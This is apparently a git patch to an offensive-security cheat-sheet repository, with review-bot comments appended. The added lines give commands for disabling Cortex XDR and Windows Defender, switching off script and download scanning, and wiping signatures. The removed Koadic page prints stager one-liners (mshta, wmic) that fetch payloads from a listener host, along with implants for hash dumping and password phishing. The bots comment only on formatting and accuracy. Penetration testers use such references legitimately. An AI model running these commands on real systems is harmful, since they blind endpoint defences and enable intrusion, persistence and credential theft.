From b0d05faded8f0e7b8fa0cab98f503a2178fda18b Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 14 Apr 2022 09:42:15 +0200 Subject: [PATCH] TruffleHog examples + Cortex XDR disable --- API Key Leaks/README.md | 7 + .../Windows - Persistence.md | 40 +++++- .../Windows - Post Exploitation Koadic.md | 123 ------------------ Server Side Request Forgery/README.md | 6 + 4 files changed, 49 insertions(+), 127 deletions(-) delete mode 100644 Methodology and Resources/Windows - Post Exploitation Koadic.md diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index acfb662..8438d2c 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md @@ -25,6 +25,13 @@ - [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder) - [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks) +- [truffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog) + ```ps1 + docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys + docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity + trufflehog git https://github.com/trufflesecurity/trufflehog.git + trufflehog github --endpoint https://api.github.com --org trufflesecurity --token GITHUB_TOKEN --debug --concurrency 2 + ``` ## Exploit diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index a95bd6f..8154ab5 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md 
@@ -64,6 +64,27 @@ PS> attrib +h mimikatz.exe Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y Elastic Agent has been uninstalled. ``` +* [Cortex XDR](https://mrd0x.com/cortex-xdr-analysis-and-bypass/) + ```ps1 + # Global uninstall password: Password1 + Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db + Look for PasswordHash, PasswordSalt or password, salt strings. + + # Disable Cortex: Change the DLL to a random value, then REBOOT + reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f + + # Disables the agent on startup (requires reboot to work) + cytool.exe startup disable + + # Disables protection on Cortex XDR files, processes, registry and services + cytool.exe protect disable + + # Disables Cortex XDR (Even with tamper protection enabled) + cytool.exe runtime disable + + # Disables event collection + cytool.exe event_collection disable + ``` ### Disable Windows Defender 
@@ -73,19 +94,30 @@ sc config WinDefend start= disabled sc stop WinDefend Set-MpPreference -DisableRealtimeMonitoring $true -# Wipe currently stored definitions -# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\ -MpCmdRun.exe -RemoveDefinitions -All - ## Exclude a process / location Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe" Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\Video, C:\install +# Disable scanning all downloaded files and attachments, disable AMSI (reactive) +PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus +PS C:\> Set-MpPreference -DisableIOAVProtection $true +# Disable AMSI (set to 0 to enable) +PS C:\> Set-MpPreference -DisableScriptScanning 1 + # Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f + +# Wipe currently stored definitions +# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\ +MpCmdRun.exe -RemoveDefinitions -All + +# Remove signatures (if Internet connection is present, they will be downloaded again): +PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All +PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All ``` + ### Disable Windows Firewall ```powershell diff --git a/Methodology and Resources/Windows - Post Exploitation Koadic.md b/Methodology and Resources/Windows - Post Exploitation Koadic.md deleted file mode 100644 index 9caea72..0000000 --- a/Methodology and Resources/Windows - Post Exploitation Koadic.md +++ /dev/null 
@@ -1,123 +0,0 @@ -# Koadic C3 COM Command & Control - JScript RAT - -> Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. - -## Installation - -```powershell -git clone https://github.com/zerosum0x0/koadic -git submodule init -git submodule update -pip2.7 install -r requirements.txt --user -python2.7 koadic -``` - -## Set a listener - -```powershell -use stager/js/mshta -set LHOST 192.168.1.19 -set SRVPORT 4444 -run - -[>] mshta http://192.168.1.19:4444/6DX7f -``` - -```powershell -use stager/js/wmic -set LHOST 192.168.1.19 -set SRVPORT 4444 -run - -[>] wmic os get /FORMAT:"http://192.168.1.19:4444/lQGx5.xsl" -``` - -### Stagers - -Stagers hook target zombies and allow you to use implants. - -Module | Description ---------|------------ -stager/js/mshta | serves payloads using MSHTA.exe HTML Applications -stager/js/regsvr | serves payloads using regsvr32.exe COM+ scriptlets -stager/js/wmic | serves payloads using WMIC XSL -stager/js/rundll32_js | serves payloads using rundll32.exe -stager/js/disk | serves payloads using files on disk - - - -## List zombies and interact with them - -```powershell -(koadic: sta/js/wmic)$ zombies - - ID IP STATUS LAST SEEN - --- --------- ------- ------------ - 0 192.168.1.30 Alive 2018-10-04 17:07:12 - -(koadic: sta/js/wmic)$ zombies 0 - ID: 0 - Status: Alive - First Seen: 2018-10-04 17:05:00 - Last Seen: 2018-10-04 17:14:42 - IP: 192.168.1.30 - User: DESKTOP-68URA9U\CrashWin - [...] - Elevated: No - [...] -``` - -Interact with `zombies zombie_id`, get a shell with `cmdshell zombie_id`. - -```powershell -[koadic: ZOMBIE 0 (192.168.1.30) - C:\Users\CrashWin]> whoami -[*] Zombie 0: Job 1 (implant/manage/exec_cmd) created. -[+] Zombie 0: Job 1 (implant/manage/exec_cmd) completed. 
-Result for `cd C:\Users\CrashWin & whoami`: -desktop-68ura9u\crashwin -``` - -## Use an implant - -Select an implant with `use module`, then fill the `info` with `set INFO value`, finally start the module with `run`. - -```powershell -(koadic: sta/js/mshta)$ use implant/phish/password_box -(koadic: imp/phi/password_box)$ set ZOMBIE 1 -(koadic: imp/phi/password_box)$ run -Input contents: -MyStrongPassword123! -``` - -### Implants - -Implants start jobs on zombies. - -Module | Description ---------|------------ -implant/elevate/bypassuac_eventvwr | Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10. -implant/elevate/bypassuac_sdclt | Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10. -implant/fun/zombie | Maxes volume and opens The Cranberries YouTube in a hidden window. -implant/fun/voice | Plays a message over text-to-speech. -implant/gather/clipboard | Retrieves the current content of the user clipboard. -implant/gather/enum_domain_info | Retrieve information about the Windows domain. -implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive. -implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file. -implant/gather/user_hunter | Locate users logged on to domain computers (using Dynamic Wrapper X). -implant/inject/mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X). -implant/inject/mimikatz_dotnet2js | Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS). -implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed). -implant/manage/enable_rdesktop | Enables remote desktop on the target. -implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output. -implant/phishing/password_box | Prompt a user to enter their password. -implant/pivot/stage_wmi | Hook a zombie on another machine using WMI. 
-implant/pivot/exec_psexec | Run a command on another machine using psexec from sysinternals. -implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN. -implant/utils/download_file | Downloads a file from the target zombie. -implant/utils/multi_module | Run a number of implants in succession. -implant/utils/upload_file | Uploads a file from the listening server to the target zombies. - -## References - -- [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/) -- [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic) \ No newline at end of file diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index ed8dd5c..a16cb7d 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -223,6 +223,12 @@ List: ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ ``` +### Bypass using unicode + +In some languages (.NET, Python 3) regex supports unicode by default. +`\d` includes `0123456789` but also `๐๑๒๓๔๕๖๗๘๙`. + + ### Bypass filter_var() php function ```powershell
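Review bot: in the truffleHog hunk of `API Key Leaks/README.md`, the fence is tagged `ps1` but the four commands are plain `docker` and `trufflehog` CLI invocations, so the tag should be `bash` (or whatever the neighbouring entries use); the first two lines also bind-mount `$PWD:/pwd` although neither `github` invocation reads from it, so either drop the mount or show an invocation that actually scans a local path. `--token GITHUB_TOKEN` reads as a literal value; mark it as a placeholder (for example `--token $GITHUB_TOKEN`) so readers do not paste a real token onto a command line that ends up in shell history and process listings.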
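Review bot: in the Cortex XDR hunk of `Windows - Persistence.md`, the `ps1` block mixes uncommented prose with commands: `Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db` and `Look for PasswordHash, PasswordSalt or password, salt strings.` carry no `#`, so the block is not pasteable as written; prefix them or move them above the fence as list text. The `reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f` line also needs a caveat beside it: CryptSvc is a core Windows service, so pointing its ServiceDll at a nonexistent DLL breaks Cryptographic Services for the whole host after the reboot the comment says is required, and a write to `Services\*\Parameters\ServiceDll` under `HKLM\SYSTEM\CurrentControlSet` is a high-signal event for any monitoring that is still running; the note should state both.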
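Review bot: in the Windows Defender hunk, the added comments mislabel the cmdlets: `Set-MpPreference -DisableIOAVProtection $true` turns off scanning of downloaded files and attachments (the first half of its comment), not AMSI, and `Set-MpPreference -DisableScriptScanning 1` turns off Defender's script scanning; neither setting disables AMSI itself, so both `Disable AMSI` comments should be corrected. The hunk also leaves `MpCmdRun.exe -RemoveDefinitions -All` in the block three times (the moved `# Wipe currently stored definitions` lines plus the two new `PS > & "..."` lines, one of which hardcodes the platform directory `4.18.2008.9-0`, which differs per install); keep one form and say that the version directory varies. Finally, the block is a `powershell` fence but the new lines carry `PS C:\>` and `PS >` prompts while the existing lines carry none, so the prompt prefixes should be stripped for consistency.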
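Review bot: the deletion of `Methodology and Resources/Windows - Post Exploitation Koadic.md` (all 123 lines) is not mentioned in the subject `TruffleHog examples + Cortex XDR disable` or anywhere in the message, and the diff gives no replacement or reason; removing a whole page should say why (tool unmaintained, content merged elsewhere) so readers following old links know where the material went, and any index or README that still links to the file should be updated in the same commit.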
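Review bot: the `### Bypass using unicode` hunk in `Server Side Request Forgery/README.md` states the regex fact correctly (`\d` matches the Thai digits `๐๑๒๓๔๕๖๗๘๙` as well as `0123456789` when the engine is Unicode-aware, as Python 3 `str` patterns and .NET are) but never connects it to SSRF, i.e. which kind of URL or IP filter it affects, so the section reads as a bare trivia line; add one sentence on the filter it applies to and the corresponding fix for developers (`[0-9]` instead of `\d`, `re.ASCII` in Python, `RegexOptions.ECMAScript` in .NET). "unicode" should be capitalised as "Unicode", and the two blank lines added before `### Bypass filter_var() php function` should be one.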